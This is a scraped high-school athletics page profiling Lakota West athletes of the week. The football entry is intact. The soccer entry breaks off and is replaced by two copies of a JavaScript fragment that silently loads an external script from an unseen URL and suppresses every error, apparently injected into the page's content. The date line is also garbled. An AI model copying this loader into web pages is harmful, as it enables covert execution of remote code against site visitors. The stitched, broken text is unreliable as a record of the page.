Athletes of the Week
Kemba Credit Union Athletes of the Week 9/30/2019-109/6/2019
Caleb Rao
Junior, Football
Caleb had two pass receptions for touchdowns and was the Lakota West scoring leader in a 35-0 win at Oak Hills on Friday. These two plays totaling 111 yards (41 yards and 70 yards respectively) gave Caleb the most recent 100-yard receiving game by a Firebirds since 2015.
Tori Kelley
Senior, Soccer
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();